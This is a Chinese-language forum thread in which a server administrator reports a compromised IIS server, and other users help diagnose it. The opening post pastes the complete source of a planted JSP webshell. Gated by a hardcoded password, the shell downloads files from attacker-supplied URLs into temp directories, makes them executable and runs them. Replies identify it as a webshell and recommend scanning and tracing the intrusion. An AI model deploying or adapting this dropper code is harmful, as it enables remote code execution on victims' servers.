这是一个创建于 1863 天前的主题,其中的信息可能已经有所发展或是发生改变。
刚才发现服务器被黑了,在 IIS 目录下多了几个文件
其中一个名为 9082addcc2ac2e12.txt 内容是 vulnerability_id:5c10a762f567dc26567d8b0b
令一个是 FxCodeShell.jsp 内容是
<%@ page import="java.util.Arrays"%>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.,java.util.,java.net.URL,java.net.HttpURLConnection"%>
<%
String view = request.getParameter("view");
if (view == null || view.equals("")) {
String localOS = System.getProperty("os.name");
List<string> osList;
String tomcatOS = "0";
String DEFAULT = "0";
String WINDOWS = "1";
String LINUX = "2";
osList = new ArrayList<string>();
osList.add("Linux");
osList.add("Windows");
for (String os : osList) {
if (localOS.contains(os)) {
if (os.equals("Linux")) {
tomcatOS = LINUX;
} else if (os.equals("Windows")) {
tomcatOS = WINDOWS;
} else {
tomcatOS = DEFAULT;
}
break;
}
}
out.write(tomcatOS + "
");
response.setHeader("OS", tomcatOS);
return;
}
%></string></string>
<% String password = "FxxkMyLie1836710Aa"; if (!view.equals(password)) { return; } int systemCode = Integer.parseInt(request.getParameter("os")); String address = request.getParameter("address"); String fileName = null; String path = null; String winPath = "C:/Windows/Temp/"; String linuxPath = "/var/tmp/"; switch (systemCode) { case 1: path = winPath; break; default: path = linuxPath; break; }
String[] urls = address.split(",");
InputStream fileInputSteam = null;
FileOutputStream fileOutputStream = null;
for (int i = 0; i <= urls.length - 1; i++) {
try {
String[] file = urls[i].split("/");
fileName = file[file.length - 1];
out.write("Download:" + urls[i] + "<br>");
out.write("<br>filename:" + fileName + "<br>");
out.write("<br>Size:" + urls.length + "<br>");
out.write(
"-------------------------------------------------------------------------------------------------------"
+ "<br><br>");
File isfile = new File(path + fileName);
if (isfile.isFile()) {
try {
Runtime exec = Runtime.getRuntime();
if (systemCode == 1) {
exec.exec(path + fileName);
} else {
String chmod = "chmod 777 " + path + fileName;
exec.exec(chmod);
exec.exec("nohup " + path + fileName + " > /dev/null 2>&1 &");
}
} catch (Exception e1) {
e1.printStackTrace();
}
continue;
}
URL downloadUrl = new URL(urls[i]);
HttpURLConnection conn = (HttpURLConnection) downloadUrl.openConnection();
conn.setConnectTimeout(60000 * 3);
conn.setReadTimeout(60000 * 3);
fileInputSteam = conn.getInputStream();
fileOutputStream = new FileOutputStream(path + fileName);
int length = -1;
byte[] b = new byte[409600];
while ((length = fileInputSteam.read(b)) != -1) {
fileOutputStream.write(b, 0, length);
fileOutputStream.flush();
}
if (conn != null) {
conn.disconnect();
}
if (fileInputSteam != null) {
fileInputSteam.close();
}
if (fileOutputStream != null) {
fileOutputStream.close();
}
Runtime exec = Runtime.getRuntime();
if (systemCode == 1) {
exec.exec(path + fileName);
} else {
String chmod = "chmod 777 " + path + fileName;
exec.exec(chmod);
exec.exec("nohup " + path + fileName + " > /dev/null 2>&1 &");
}
} catch (Exception e2) {
e2.printStackTrace();
}
}
%>
 |
1
sunbing OP Windows service 2003
|
 |
2
11232as 2019-03-13 19:11:20 +08:00 via Android
"FxxkMyLie"是个嘛…
|
 |
3
shiny 2019-03-13 19:12:18 +08:00
Webshell
|
|
4
sunbing OP 多了很多远程进程,多了个用户,不知道有没有其他后门
|
 |
5
mmdsun 2019-03-13 19:26:24 +08:00 via Android
厉害了。黑客还会 java
|
 |
6
xiaomimei 2019-03-13 19:50:24 +08:00 via Android  1
像是大马,看代码里写连接密码是 FxxkMyLie1836710Aa,改一下文件等他下次上马,试试能不能溯源😂
|
 |
8
1nclude 2019-03-14 16:44:10 +08:00
查杀下 webshell,找下漏洞在哪
|
|
10
1nclude 2019-03-15 09:03:47 +08:00
http://www.d99net.net/News.asp?id=62
用下 d 盾,最重要的是找出怎么被入侵的呀 |
Select Language